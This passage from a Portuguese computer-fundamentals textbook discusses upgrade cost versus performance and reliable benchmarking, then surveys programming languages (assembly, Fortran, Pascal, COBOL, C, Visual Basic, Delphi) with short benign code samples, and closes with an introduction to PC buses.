entre a versão mais rápida e a versão mais lenta encontrada à venda
(que em geral tem um desempenho apenas 35 ou 50% menor) pode
ser de mais de 10 vezes! Por exemplo, logo que o Pentium III de 1
GHz foi lançado, custava nos EUA, quase 1.000 dólares. Na mesma
época, as mesmas lojas (nos EUA), vendiam um Celeron de 500 MHz
por cerca de apenas 50 dólares! No Brasil os preços claro são um
pouco mais altos, mas a proporção é a mesma.

Vendo isso, você logo perceberá que simplesmente não vale à pena
comprar o processador mais rápido, mas sim pagar 3 ou 4 vezes
menos por um processador apenas um pouco mais lento.

Em outras áreas, como no ramo de placas de vídeo 3D, a diferença


não é tão gritante assim, mas as placas top de linha em geral custam
2 vezes mais do que as versões anteriores, sendo em geral 25 ou
30% mais rápidas. No caso da memória RAM, não existe uma grande
evolução em termos de velocidade, porém muitas vezes é preciso
trocar os módulos de memória ao atualizar um sistema antigo, caso o
sistema antigo utilize memórias de 72 vias por exemplo.

No caso do HD, o fator mais importante é a capacidade, mas o de-


sempenho também é fundamental. Muitas vezes um HD menor é
muito mais rápido do que um de maior capacidade.

69
Nos últimos anos, os equipamentos evoluíram muito mais rapidamen-
te do que os requisitos dos programas. Ao contrário do que tínhamos
a alguns anos atrás, um micro de dois anos, completamente ultrapas-
sado pelos padrões atuais, pode rodar com desenvoltura quase todos
os aplicativos mais atuais. A menos que você trabalhe em uma área
muito crítica em termos de desempenho, como edição de vídeo por
exemplo, muitas vezes você sequer notará muita diferença entre o
desempenho de um micro top de linha e um equipamento um pouco
mais antigo, desde claro, que ambos estejam corretamente configu-
rados.

Atualmente, temos apenas dois tipos de aplicativos que realmente


utilizam todo o poder de processamento de um micro top de linha:
aplicativos profissionais de renderização de imagens e edição de
vídeo e os jogos mais atuais. Isso não significa que estes aplicativos
não rodem ou fiquem muito lentos em um micro um pouco ultrapas-
sado, mas que ficam mais rápidos, ou com mais detalhes (no caso
dos jogos) num micro top de linha (se vale à penas gastar duas vezes
mais para ter apenas um pouco mais de desempenho).

Em aplicações mais leves, como processamento de textos, acesso à


Internet, jogos um pouco mais antigos (lançados a mais de 18 meses)
e mesmo programas gráficos (com exceção apenas de filtros e ope-
rações mais demoradas) a diferença para o usuário é mínima. Não se
iluda muito com os resultados mostrados nos benchmarks; qual seria
a diferença, para você, se uma imagem demorasse 2.5 segundos ao
invés de apenas 1.5 segundos para ser aberta no Photoshop, ou se o
Word demorasse 0.5 segundo ao invés de apenas 0.35 segundo para
abrir uma nova janela? Para alguém que trabalha editando imagens e
aplicado filtros e efeitos que muitas vezes demoram horas para serem
processados, talvez um ganho de 10 ou 15% de desempenho resul-
tasse em um grande ganho de produtividade.

Além de saber escolher os componentes com relação à qualidade,


preocupe-se em se perguntar “será que realmente vou precisar de
tudo isso?” quando for comprar um novo micro. Claro que não vale à
pena comprar um equipamento muito ultrapassado, mas também
pode não valer à pena comprar um top de linha.

70
Benchmarks, medindo sem erros

Existem vários programas dedicados a medir a performance de um


componente isolado, o HD por exemplo, ou o desempenho do micro
como um todo, neste caso simulando o trabalho de programas do dia
a dia. Porém, é muito fácil forjar resultados, fazendo parecer que um
produto é muito melhor do que o do concorrente, mesmo sem distor-
cer os resultados obtidos pelo programa.

Em geral, um determinado componente, um processador por exem-


plo, mesmo que no geral seja um pouco mais lento do que o do con-
corrente, sempre se sairá melhor do que ele em algumas aplicações.
Se for criado um programa de benchmark que privilegie estas opera-
ções que são executadas mais rápido, temos o milagre de fazer um
equipamento inferior parecer mais rápido.

No mundo capitalista, este tipo de estratégia, de divulgar as vanta-


gens de um produto, ao mesmo tempo que se esconde seus defeitos,
é muito usada em todos os setores, não apenas no mundo da infor-
mática. Por isso que em geral não se deve dar tanta atenção aos
benchmarks divulgados pelos próprios fabricantes. Muitos são hones-
tos ao apresentar os resultados, mas outros não, sempre nos deixan-
do com o pé atrás.

Mesmo em se tratando de testes feitos por pessoas bem intenciona-


das, sem nenhum tipo de vínculo com os fabricantes, muitas vezes
temos resultados errados, simplesmente por serem usados progra-
mas de benchmark inadequados ou ultrapassados. Por exemplo,
rodando o Norton System Info para DOS, que é um benchmark bem
antigo, em um Pentium de 200 MHz e em um Core i7 de 3.6 MHz, os
resultados obtidos mostrarão o Pentium comum mais de duas vezes
mais rápido do que o Core i7, quando na prática o Core i7 é muito
mais rápido. Usando o Wintune 97 em um Pentium MMX de 233 MHz
e em um K6, também de 233 MHz, teremos resultados mostrando o
K6 quase 50% mais rápido, quando na realidade os dois processado-
res praticamente empatam. Estes são apenas dois exemplos de uma
lista enorme.

71
Existem programas que realmente conseguem mostrar resultados
bastante precisos. A Ziff Davis por exemplo, desenvolve excelentes
programas de bachmark para várias situações; para medir o desem-
penho dentro de aplicativos de escritório, para medir o desempenho
em gráficos 3D, etc.

Estes são os programas adotados nos testes da PC Magazine Ameri-


cana, entre outras publicações. Os programas da Ziff Davis podem
ser encontrados em http://www.ziffdavis.com Existem outros casos
de bons programas claro, como por exemplo o BAPCo SYSMark,
SPECviewperf 6.1.1 entre outros.

A fim de medir corretamente a performance, é preciso executar testes


relativamente demorados. Esta é a principal diferença entre bons
programas de benchmark e outros que mostram erros gritantes, jus-
tamente o tempo do teste.

Enquanto no Business Winstone da Ziff Davis, o teste pode durar


várias horas, no Wintune o teste dura poucos segundos. Em 99% dos
casos, estes testes rápidos são imprecisos.

Outro diferencial são as próprias configurações utilizadas para execu-


tar os testes. Para medir o ganho de desempenho obtido na troca de
um processador por outro ou de uma placa de vídeo por outra, é pre-
ciso manter todos os demais componentes, drivers, mesma versão do
sistema operacional etc. mudando apenas o componente a ser testa-
do.

Caso contrário, outros componentes contaminarão os resultados,


tornando o teste impreciso. A simples troca do driver da placa de
vídeo entre os testes pode fazer um equipamento aparecer muito
mais rápido ou lento que o outro.

Naturalmente, é necessária também uma boa dose de bom senso e


de conhecimento do quanto cada componente utilizado influencia na
performance de cada aplicativo.

Moral da história: não acredite em todos os números que ver por aí.
Lembre-se dos comerciais de sabão em pó; nem sempre um produto

72
é tão melhor que outro quanto parece, tudo depende das condições
onde os testes são realizados.

Tão importante quanto o programa de benchmark escolhido, são os


conhecimentos da pessoa que executar o teste, que deve ser capaz
de escolher uma configuração ideal, eliminando qualquer fator que
possa contaminar os resultados.

Linguagens de programação

Os computadores são funcionários quase perfeitos. Fazem tudo o


que mandamos, não reclamam, não se importam de trabalhar até
tarde da noite, não cobram hora extra nem tiram férias. Mas, em
compensação também não pensam. Para que façam qualquer coisa é
preciso explicar tudo com os mínimos detalhes e na língua deles.

Considerando que tudo o que os computadores conseguem entender


são sequências intermináveis de números binários, fornecer estas
“instruções” pode ser muito penoso para um ser humano.

Imagine-se lendo um manual de 5.000 páginas e decorando uma a


uma as centenas de códigos binários que representam as instruções
do processador.

Colocando a mão na massa

Mesmo com transístores de 0.13 mícron, mais de 30 milhões de tran-


sístores num único processador e frequências de operação acima de
3 GHz, os computadores ainda são completamente incapazes de
tomar sozinhos qualquer tipo de decisão, precisam ser orientados a
cada passo, afinal, são apenas máquinas.

Para conseguir que nossas máquinas burras possam fazer todas as


coisas produtivas que vemos, é preciso orientá-las através de softwa-
res, que por sua vez são construídos usando alguma linguagem de
programação.

Um processador manipula apenas dados binários. Tantos os dados a


serem acessados, quanto cada uma das instruções que o processa-

73
dor é capaz de executar possuem um endereço binário próprio. Se os
programadores precisassem programar diretamente em binários,
decorando sequências como 10111011101101101110110011001010
para cada instrução do processador e para cada endereço de memó-
ria a ser acessado, provavelmente não teríamos mais programadores,
já estariam todos loucos.

Para facilitar as coisas, começaram a ser desenvolvidas as lingua-


gens de programação, que diferem na sintaxe e recursos, mas tem
um ponto em comum, que é a existência de um compilador. Seja
programando em C, ou seja em Visual Basic, você usará um editor
para escrever seu programa, respeitando as regras da linguagem
escolhida e em seguida rodará o programa compilador, que interpre-
tará os comandos que inclui no programa e os transformará em biná-
rios, as instruções que são entendidas pelo processador. A vantagem
é que você poderá trabalhar com instruções como if, else, etc. além
de todas as facilidades oferecidas pela linguagem ao invés de gigan-
tescos endereços binários. Sem dúvida muito mais simples.

Existem diversas linguagens de programação, nosso objetivo é dar


algumas noções básicas sobre as peculiaridades e utilidade de cada
uma:

Assembly

O Assembly foi provavelmente a primeira linguagem de programação


da história, surgida na década de 50, época em que os computadores
ainda usavam válvulas. A ideia do assembly é usar um comando em
substituição a cada instrução de máquina.

No assembly, cada uma destas instruções, equivale a uma instrução


do processador. Ao invés de usar instruções como 10101011 você
pode usar outras bem mais fáceis de entender e de memorizar, como
add, div, mul, and, or, not, etc. Você também pode criar variáveis, que
são pequenos espaços na memória RAM reservados para guardar
algum tipo de dado, que o programa precisará mais tarde. Você pode
usar aquelas instruções citadas para lidar com elas. Por exemplo, a
instrução "add" faz com que o processador some duas variáveis; "add
x, y" por exemplo, soma os valores de x e y.

74
Apesar de ser exaustivamente trabalhoso, você pode perfeitamente
desenvolver pequenos programas em assembly, para isso só vai
precisar de um compilador e bastante paciência para aprender. Você
pode baixar um gratuito em http://www.web-sites.co.uk/nasm/ nesta
mesma página você vai encontrar alguns manuais que podem ajudar
bastante.

O compilador transforma o código escrito em assembly em linguagem


de máquina, que finalmente poderá ser entendida pelo processador.

Existem também os descompiladores, que fazem o trabalho inverso,


de transformar um programa já compilado, em um código em lingua-
gem assembly. Este recurso é chamado de engenharia reversa. É
assim que conseguem crackear programas, quebrar códigos de pro-
teção (como o do DVD), etc. Claro que para isso, é preciso alguém
que conheça muito de assembly e que tenha disposição para ficar
estudando o código até encontrar o que procura.

Por causa desta característica de permitir trabalhar diretamente com


as instruções do processador, o assembly é chamado de linguagem
de baixo nível. Existem também linguagens de alto nível, como C++
ou Pascal, onde é possível usar várias funções já prontas ou mesmo
linguagens visuais, como o Visual Basic ou o Delphi, que são ainda
mais fácies.

Como o compilador utiliza instruções específicas para o processador


da máquina, é preciso desenvolver uma versão diferente da lingua-
gem para cada sistema onde se desejar usa-la.

Veja exemplos de programação em Linguagem Assembly


Arquitetura Intel

Código em assembly que usa a sintaxe intel.


Decimal Endereço OPcode
2089872304 7C90EBB0 sub
2089872310 7C90EBB6 mov
2089872316 7C90EBBC mov
2089872322 7C90EBC2 mov

75
2089872325 7C90EBC5 mov
2089872328 7C90EBC8 mov
2089872331 7C90EBCB lea
2089872337 7C90EBD1 mov
2089872343 7C90EBD7 mov
2089872349 7C90EBDD mov
2089872355 7C90EBE3 mov
2089872361 7C90EBE9 mov
2089872367 7C90EBEF lea
2089872370 7C90EBF2 mov
2089872376 7C90EBF8 mov
2089872379 7C90EBFB mov
2089872385 7C90EC01 mov
2089872388 7C90EC04 mov
2089872394 7C90EC0A mov
2089872400 7C90EC10 mov
2089872406 7C90EC16 mov
2089872412 7C90EC1C mov
2089872418 7C90EC22 mov
2089872424 7C90EC28 mov
2089872430 7C90EC2E mov
2089872436 7C90EC34 push
2089872438 7C90EC36 push
2089872439 7C90EC37 push
2089872442 7C90EC3A call
2089872447 7C90EC3F sub
2089872450 7C90EC42 mov
2089872453 7C90EC45 mov
2089872461 7C90EC4D mov
2089872469 7C90EC55 mov
2089872472 7C90EC58 mov
2089872476 7C90EC5C mov
2089872478 7C90EC5E push
2089872479 7C90EC5F call

Microprocessador Texas Instruments TMS320C2x]


LOOP:
LARP AR1
LRLK AR1, apontador

76
ADRK TAMANHO_CONSTANTE
ADRK fimcon_rx
LAC *
BZ NAOPASSARAM10MS
ZAC
SACL *
LARP AR1
LRLK AR1,apontador+CONSTANTE_A
ADRK controle
LAC *
BZ LOOP ;Não decorrido tempo: fica no
loop

NAOPASSARAM10MS:
SACL *
LARP AR1
B LOOP

Microprocessador Texas Instruments TMS320C5x


LOOP:
mvmm ar1, ar3 ;move conteúdo de ar1
para ar3
rpt #10 ;repete
mvdd *ar3+, *ar5+ ;move word endereçada
por ar1 para pos. end. por ar6

;Instruçoes com acumulador:


STM #1000h, AR1 ;carrega ar1 com a
constante 1000h
LD #0, A ;zera o acumulador
STL A, *AR1 ;armazena no acumula-
dor mínimo
LD #1, A ;carrega o acumulador
com a constante mínima "1"
STL A, *AR1 ;armazena o acumula-
dor mínimo no endereço de ar1
LD #65535, A ;carrega acumulador
com a constante "65535"

77
STL A, 10 ;armazena o acumula-
dor mínimo no endereço 10
STH A, 10 ;armazena o acumula-
dor máximo no endereço 10
STL A, *AR1 ;armazena o acumula-
dor mínimo no endereço de ar1
STH A, *AR1 ;armazena o acumula-
dor máximo no endereço de ar1

;Instruções com registradores auxiliares:


STM #1, AR1 ;carrega ar1 com a
constante "1"
STM #2, AR0 ;carrega ar0 com a
constante "2"
MAR *AR1+0 ;adiciona o conteúdo
de ar0 to ar appointed by arp (1)
MVDK 256, *(AR2) ;carrega ar2 with
content of address 256
MAR *AR1+ ;incrementa ar apon-
tado por arp (1)
MVKD *(AR2), 256 ;aloja conteúdo de
ar2 no endereço 256
MAR *AR1- ;decrementa ar ap-
pointed by arp (1)

;Instruções de teste de bit:


BITF *AR1, #128 ;TESTA BIT D7
BC ptr, NTC ;vai para ptr se bit
for igual a 0
MAR *AR1+ ;incrementa ar apon-
tado por arp (1)

ptr:
MAR *+AR4(-128) ;sbrk 80h

;Instruções de uso de ponteiros:


mvdm *(VETORAL), ar1 ;move conteúdo da
memória apontada para o ar (transforma arn em pon-
teiro)

78
mvmd ar1, *(VETORAL) ;mvmd restaura pon-
teiro(VETORAL) de acordo com arn
b LOOP

Fortran

O Fortran foi uma das primeiras linguagens de alto nível da história.


Enquanto o Assembly é chamado de linguagem de baixo nível, por
nele utilizarmos diretamente as instruções e endereços do processa-
dor e memória, numa linguagem de alto nível temos várias funções
prontas, o que facilita muito a programação, mas em compensação
torna em muitos casos o programa maior e mais pesado, já que o
compilador jamais conseguirá gerar um código tão otimizado quanto
um programador experiente conseguiria.

Fortran é a contração de “Formula Translator”. A primeira versão do


Fortran foi criada no final da década de 50, mas a linguagem come-
çou a ser usada em larga escala a partir da metade da década de 60,
quando surgiram várias versões diferentes. Atualmente o Fortran é
pouco usado.

Calculando a área do cilindro em linguagem Fortran


program cilindro
! Calcula a área de um cilindro.
!
! Declara as variáveis e constantes.
implicit none ! Requer que todas as variáveis sejam
declaradas
integer :: ierr
real :: raio,altura,area
real , parameter :: pi = 3.14159
do
! Pergunta ao usuário o raio e a altura e lê os
valores.
write (*,*) "Entre com o raio e a altura, 'q'
para sair."
read (*,*,iostat=ierr) raio,altura
!

79
! Se o raio e a altura não puderam ser lidos da
entrada, termina o programa.
if (ierr /= 0) stop "finalizando o programa"
!
! Calcula a área. O sinal ** significa "eleva a
uma potência".
area = 2*pi*(raio**2 + raio*altura)
!
! Escreve as variáveis de entrada (raio, altura)
e a saida (área) na tela.
write
(*,"(1x,'raio=',f6.2,5x,'altura=',f6.2,5x,'area=',f
6.2)") raio,altura,area
end do
end program cilindro

Pascal

O Pascal é outra linguagem de alto nível, criada durante a década de


60. O Pascal é uma linguagem bastante estruturada, com regras bas-
tante rígidas, o que o torna difícil de usar.

Apesar de ter sido bastante usada até a década de 80, hoje em dia
ele é usado apenas em alguns cursos como ferramenta de aprendi-
zado.

Teste lógico - em linguagem Pascal

program Teste;
var
a, b:integer;
begin
writeln('Digite um número para 7');
readln(a);
writeln('Digite o número para 6');
readln(b);
if (a > b) then { Se 7 é maior que 6 então }
writeln('7 é maior que 6')
else { Senão… }

80
if (a < b) then
writeln('6 é maior que 7')
else
writeln('6 é igual à 7');
end.

Cobol

Cobol significa “Common Business Oriented Language”. Esta lingua-


gem foi desenvolvida no final da década de 50, com o objetivo de ser
uma plataforma de desenvolvimento para aplicações bancárias e
financeiras em geral. Comparado com o Pascal e o Assembly, co-
muns na época, o Cobol é uma linguagem bastante amigável, o que
garantiu uma grande aceitação. Até hoje esta linguagem é usada em
muitos sistemas bancários, o que explica a grande procura por pro-
gramadores experientes nesta linguagem na época do bug do ano
2000.

Exemplo de rotina em Cobol


O programa abaixo listado tem por finalidade o cálculo ou a validação dos
dígitos verificadores dos números do CPF, CNPJ ou PIS/PASEP.

O código pode ser copiado e colado dentro de um programa ou utilizá-lo


como um outro a ser chamado usando a area da LINKAGE SECTION para o
tratamento do retorno.

A linha abaixo só deve ser usada para processamento BATCH (LINKAGE


SECTION) 05 COMPRIMENTO PIC S9(04) COMP.

1 2 3 4 5 6 7
123456789012345678901234567890123456789012345678901234567890123456789012

*--------------------------------------------
IDENTIFICATION DIVISION.
*--------------------------------------------
PROGRAM-ID. CADDIGIT.
AUTHOR. CARLOS ALBERTO DORNELLES.
*--------------------------------------------
* PROGRAMA : CADDIGIT
* OBJETIVO : VERIFICA O DIGITO DO CPF CNPJ OU PIS/PSASEP
* ANALISTA : CARLOS ALBERTO DORNELLES
* LINGUAGEM : COBOL
* MODO OPERACAO : BATCH

81
* COMO USAR : LKS-NUMERO-I ....: NUMERO INFORMADO
* : LKS-NUMERO-F ....: NUMERO CALCULADO
* : LKS-TIPO-CALCULO : CPF, CGC OU PIS
* : LKS-ACAO ........: C - CALCULA
* V - VERIFICA
*--------------------------------------------
* VERSAO DD.MM.AAAA HISTORICO/AUTOR
* ------ ---------- ---------------
* 001 24.09.2004 PROGRAMA INICIAL
*--------------------------------------------

*--------------------------------------------
ENVIRONMENT DIVISION.
*--------------------------------------------
CONFIGURATION SECTION.
SPECIAL-NAMES. DECIMAL-POINT IS COMMA.
INPUT-OUTPUT SECTION.
FILE-CONTROL.

*--------------------------------------------
DATA DIVISION.
*--------------------------------------------
FILE SECTION.

*--------------------------------------------
WORKING-STORAGE SECTION.
*--------------------------------------------

01 WS-AUXILIARES.
05 WSS-IND-N PIC 9(002) VALUE ZEROES.
05 WSS-IND-O PIC 9(002) VALUE ZEROES.
05 WSS-IND-P PIC 9(002) VALUE ZEROES.
05 WSS-SOMA PIC 9(008) VALUE ZEROES.
05 WSS-NUMERO PIC 9(015) VALUE ZEROES.
05 WSS-NUMERO-R REDEFINES WSS-NUMERO.
10 WSS-NUMERO-T PIC 9(001) OCCURS 15 TIMES.
05 WSS-PESOS PIC X(028) VALUE SPACES.
05 WSS-PESOS-R REDEFINES WSS-PESOS.
10 WSS-PESOS-T PIC 9(002) OCCURS 14 TIMES.
05 WSS-QUOCI PIC 9(008) VALUE ZEROES.
05 WSS-RESTO PIC 9(008) VALUE ZEROES.
05 WSS-MENSAGEM PIC X(078) VALUE SPACES.
05 WSS-PESOS-CPF PIC X(028) VALUE
'0000000011100908070605040302'.
05 WSS-PESOS-CGC PIC X(028) VALUE
'0706050403020908070605040302'.
05 WSS-PESOS-PIS PIC X(028) VALUE
'0000000003020908070605040302'.

*--------------------------------------------
LINKAGE SECTION.
*--------------------------------------------

01 LKS-PARAMETRO.
05 COMPRIMENTO PIC S9(04) COMP.
05 LKS-NUMERO-I PIC 9(015).

82
05 FILLER PIC X(001).
05 LKS-NUMERO-F PIC 9(015).
05 FILLER PIC X(001).
05 LKS-TIPO-CALCULO PIC X(003).
05 FILLER PIC X(001).
05 LKS-ACAO PIC X(001).
05 LKS-RETORNO PIC 9(001).
*-------------------------------------------
* LKS-NUMERO-I = número da ser informado
* LKS-NUMERO-F = número retornado do programa
* LKS-TIPO-CALCULO = CPF ou CGC ou PIS
* LKS-ACAO = C (calcula) V (verifica)
* LKS-RETORNO = 0 - codigo verificado está correto
* = 1 - LKS-TIPO-CALCULO está incorreto
* = 2 - LKS-ACAO está incorreta
* = 3 - código verificado está com erro
*--------------------------------------------

*--------------------------------------------
PROCEDURE DIVISION USING LKS-PARAMETRO.
*--------------------------------------------

PERFORM P1000-INICIAL THRU P1000-FIM


PERFORM P2000-PRINCIPAL THRU P2000-FIM
PERFORM P9500-FINAL THRU P9500-FIM
GOBACK.

*--------------------------------------------
P1000-INICIAL.
*--------------------------------------------

MOVE ZEROES TO LKS-RETORNO


EVALUATE TRUE
WHEN LKS-ACAO = 'C'
EVALUATE LKS-TIPO-CALCULO
WHEN 'CPF'
MOVE LKS-NUMERO-I (07:09) TO WSS-NUMERO (05:09)
WHEN 'CGC'
MOVE LKS-NUMERO-I (03:13) TO WSS-NUMERO (01:13)
WHEN 'PIS'
MOVE LKS-NUMERO-I (06:10) TO WSS-NUMERO (05:10)
WHEN OTHER
MOVE 1 TO LKS-RETORNO
GOBACK
END-EVALUATE
WHEN LKS-ACAO = 'V'
EVALUATE LKS-TIPO-CALCULO
WHEN 'CPF'
WHEN 'CGC'
WHEN 'PIS'
MOVE LKS-NUMERO-I TO WSS-NUMERO
WHEN OTHER
MOVE 1 TO LKS-RETORNO
GOBACK
END-EVALUATE
WHEN OTHER

83
MOVE 2 TO LKS-RETORNO
GOBACK
END-EVALUATE.

P1000-FIM.
EXIT.

*--------------------------------------------
P2000-PRINCIPAL.
*--------------------------------------------

EVALUATE LKS-TIPO-CALCULO
WHEN 'CPF'
PERFORM P2100-CALCULO-CPF THRU P2100-FIM
WHEN 'CGC'
PERFORM P3100-CALCULO-CGC THRU P3100-FIM
WHEN OTHER
PERFORM P2400-CALCULO-PIS THRU P4100-FIM
END-EVALUATE.

P2000-FIM.
EXIT.

*--------------------------------------------
P2100-CALCULO-CPF.
*--------------------------------------------

MOVE WSS-PESOS-CPF TO WSS-PESOS


MOVE 05 TO WSS-IND-N
MOVE 06 TO WSS-IND-P
MOVE 13 TO WSS-IND-O
MOVE ZEROES TO WSS-SOMA
PERFORM P7000-CALC-DIGITO-1 THRU P7000-FIM

MOVE 05 TO WSS-IND-N
MOVE 05 TO WSS-IND-P
MOVE 14 TO WSS-IND-O
MOVE ZEROES TO WSS-SOMA
PERFORM P8000-CALC-DIGITO-2 THRU P8000-FIM.

P2100-FIM.
EXIT.

*--------------------------------------------
P3100-CALCULO-CGC.
*--------------------------------------------

MOVE WSS-PESOS-CGC TO WSS-PESOS


MOVE 01 TO WSS-IND-N
MOVE 02 TO WSS-IND-P
MOVE 13 TO WSS-IND-O
MOVE ZEROES TO WSS-SOMA
PERFORM P7000-CALC-DIGITO-1 THRU P7000-FIM

MOVE 01 TO WSS-IND-N

84
MOVE 01 TO WSS-IND-P
MOVE 14 TO WSS-IND-O
MOVE ZEROES TO WSS-SOMA
PERFORM P8000-CALC-DIGITO-2 THRU P8000-FIM.

P3100-FIM.
EXIT.

*--------------------------------------------
P2400-CALCULO-PIS.
*--------------------------------------------

MOVE WSS-PESOS-PIS TO WSS-PESOS


MOVE 05 TO WSS-IND-N
MOVE 05 TO WSS-IND-P
MOVE 14 TO WSS-IND-O
MOVE ZEROES TO WSS-SOMA
PERFORM P8000-CALC-DIGITO-2 THRU P8000-FIM.

P4100-FIM.
EXIT.

*--------------------------------------------
P7000-CALC-DIGITO-1.
*--------------------------------------------

MOVE ZEROES TO WSS-SOMA


PERFORM UNTIL WSS-IND-N GREATER WSS-IND-O
COMPUTE WSS-SOMA = WSS-SOMA +
(WSS-NUMERO-T (WSS-IND-N) *
WSS-PESOS-T (WSS-IND-P))
ADD 1 TO WSS-IND-N
WSS-IND-P
END-PERFORM
DIVIDE WSS-SOMA BY 11 GIVING WSS-QUOCI REMAINDER WSS-RESTO
IF WSS-RESTO EQUAL 0 OR 1
MOVE ZEROES TO WSS-NUMERO-T (14)
ELSE
SUBTRACT WSS-RESTO FROM 11 GIVING WSS-NUMERO-T (14)
END-IF.

P7000-FIM.
EXIT.

*--------------------------------------------
P8000-CALC-DIGITO-2.
*--------------------------------------------

MOVE ZEROES TO WSS-SOMA


PERFORM UNTIL WSS-IND-N GREATER WSS-IND-O
COMPUTE WSS-SOMA = WSS-SOMA +
(WSS-NUMERO-T (WSS-IND-N) *
WSS-PESOS-T (WSS-IND-P))
ADD 1 TO WSS-IND-N
WSS-IND-P
END-PERFORM

85
DIVIDE WSS-SOMA BY 11 GIVING WSS-QUOCI REMAINDER WSS-RESTO
IF WSS-RESTO EQUAL 0 OR 1
MOVE ZEROES TO WSS-NUMERO-T (15)
ELSE
SUBTRACT WSS-RESTO FROM 11 GIVING WSS-NUMERO-T (15)
END-IF.

P8000-FIM.
EXIT.

*--------------------------------------------
P9500-FINAL.
*--------------------------------------------

MOVE WSS-NUMERO TO LKS-NUMERO-F


IF LKS-ACAO EQUAL 'V'
IF LKS-NUMERO-I EQUAL LKS-NUMERO-F
MOVE 0 TO LKS-RETORNO
ELSE
MOVE 3 TO LKS-RETORNO
END-IF
ELSE
MOVE 0 TO LKS-RETORNO
END-IF.

P9500-FIM.
EXIT.

O C foi desenvolvido durante a década de 70, mas ainda é largamen-


te utilizado. A grande vantagem do C é permitir escrever tanto pro-
gramas extremamente otimizados para a máquina, como seria possí-
vel apenas em assembly, e ao mesmo tempo vir com várias funções
prontas, como uma linguagem de alto nível, que podem ser utilizadas
quando não for necessário gerar um código tão otimizado.

Esta flexibilidade, permitiu que o C fosse usado para desenvolver a


maioria dos sistemas operacionais, como o Unix, Linux e o próprio
Windows. Usando o compilador adequado, o C pode ser usado para
desenvolver programas para várias plataformas diferentes.

Exemplo de rotina em C

// Sorteia 6 números para MEGASENA (não verifica repeti-


ção)
#include <stdio.h>
#include <stdlib.h>

86
#include <time.h>
int main() {
int i, numeroSorteado;

// coloca a hora atual como semente para geração de


randômicos
srand(time(NULL));

for(i=1; i<=6; i++) {


// a função rand gera números aleatórios de 0 a
32767 (padrão)
numeroSorteado = rand() % 60;
printf("Numero %d: %d\n", i, numeroSorteado);
}

printf("\n\n\n");
system("pause");
return 0;
}

C++

O C++ mantém os recursos do C original, mas traz muitos recursos


novos, como recursos orientados a objetos, sendo também bem mais
fácil de utilizar. O C++ é bastante usado atualmente para desenvolver
muitos programas para várias plataformas.

O Linux conta com um grande número de ferramentas para desenvol-


vimento em C, como o EMacs, o compilador GCC e até editores visu-
ais, como o KDeveloper. Outro ponto forte é a fartura de programas
de código aberto, que representam uma fonte de aprendizado quase
inesgotável.

O Linux é provavelmente o melhor lugar para aprender a programar


em C.

Visual Basic

Por ser uma linguagem visual, o VB é extremamente fácil de usar,


janelas, botões e muitas funções já vem prontas, bastando ao pro-
gramador usa-las em seus programas. O custo da praticidade é o fato

87
dos programas serem bem mais pesados do que equivalentes feitos
em outras linguagens, como em C e de rodarem apenas dentro do
Windows.

Exemplo de um código em Visual Basic

Private Sub Form_Load()


'Exibe uma caixa de mensagem com a descrição
"Olá mundo!"
MsgBox "Olá mundo!"
End Sub

Private Sub Command1_Click()

On Error GoTo Erro


Dim A ,B ,C as Long
A = InputBox("Informe o 1° número a somar : ",
"Soma", "")
B = InputBox("Informe o 2° número a somar : ",
"Soma", "")
C = A + B
MsgBox C, vbInformation + vbOKOnly, "Soma"
Exit Sub
Erro:
If Err.Number <> 0 Then
MsgBox "Ocorreu o seguinte erro : " &
Err.Description & vbCrLf & "Código do erro : " &
Err.Number, vbInformation + vbOKOnly, "Alerta!"
End If

End Sub

Delphi

O Delphi também é uma linguagem visual, baseada no Pascal. Hoje


em dia, o Delphi divide com o visual Basic a preferência da maioria
dos programadores.

88
Apesar de também ter algumas deficiências, a opinião das maioria
dos programadores é que de uma forma geral, os programas escritos
em Delphi são mais rápidos do que os desenvolvidos em Visual Ba-
sic. O Delphi possui uma versão for Linux, o Kylix, também desenvol-
vido pela Borland e gratuito para o desenvolvimento de softwares
cobertos pela GNU.

Os programas para Delphi 6 e Kylix rodam nas duas plataformas,


bastando que o código seja recompilado. O código desenvolvido em
versões anteriores precisa ser adaptado para rodar no Linux. Natu-
ralmente, além destas citadas, existem inúmeras outras linguagens,
cada uma com seus pontos fracos e fortes e determinada área onde é
mais usada.

Exemplo de um código em Delphi

TClasse = class(TClassePai)
{
Define o nome da classe e de quem ela é herdada.
Se o parâmetro TClassePai for omitido, a classe será her-
dada de TObject,
que é a classe da qual todas herdam no Delphi.
}
private
//Aqui ficam os campos e métodos vistos apenas pela pró-
pria classe.
protected
//Aqui ficam os campos e métodos vistos pela própria clas-
se e suas descendentes.
public
//Aqui ficam os campos e métodos vistos por todas as clas-
ses.
end.

Existem ainda muitas outras linguagens de programação utilizadas


pelos programadores espalhados pelo mundo todo. Podemos citar
algumas como: PHP, RPG, Java, Basic, etc.

Barramentos internos e externos

Barramentos são conjuntos de sinais digitais através dos quais o pro-


cessador transmite e recebe dados de circuitos externos. Alguns bar-

89
ramentos são usados para transmissões feitas entre placas, ou den-
tro de uma mesma placa. Existem vários barramentos nesta catego-
ria:

 Barramento local
 Barramento da memória
 Barramento PCI
 Barramento ISA
 Barramento AGP
 Barramento AMR/CNR

Esses serão os barramentos estudados neste capítulo. Outros barra-


mentos são usados para que o processador e a memória possam
receber e transmitir dados para periféricos e dispositivos externos.
Entre eles podemos citar os seguintes:

 Barramento SCSI
 Barramento USB
 Barramento Firewire
 Barramento IDE

Figura 1
Principais barramentos de uma placa de CPU.

A figura 1 mostra o diagrama em blocos de uma placa de CPU. Nele


podemos ver o processador, as memórias, os dois principais integran-
tes do chipset (North Bridge e South Bridge – ponte norte e ponte
sul), a memória, os slots PCI e AGP, o barramento ISA, as interfaces

90
IDE e USB, o chip Super I/O e suas interfaces. Neste capítulo estu-
darmos detalhadamente os seguintes barramentos indicados nesta
figura:

1) Barramento do processador, barramento local ou barramento de


sistema. É aquele através do qual o processador faz contato direto
com o chipset, e a partir daí, com os demais barramentos. Especifi-
camente este barramento é ligado ao chip chamado ponte norte,
north bridge ou system controller.

2) Barramento da memória. Ligado diretamente na ponte norte, dá


acesso aos soquetes nos quais são instalados os módulos de memó-
ria.

3) Barramento AGP. É usado para a instalação de uma placa de ví-


deo AGP.

4) Barramento PCI. Através deles podemos usar placas de expansão


PCI. A maioria das placas de expansão atuais usam este barramento.

5) Barramento ISA. Usado na ligação com placas de expansão anti-


gas que seguiam este padrão. Já existem placas de CPU que não
apresentam mais o barramento ISA, mas no seu lugar utilizam um
barramento interno chamado LPC, usado na comunicação com o
BIOS e com o chip Super I/O.

91
O barramento do processador

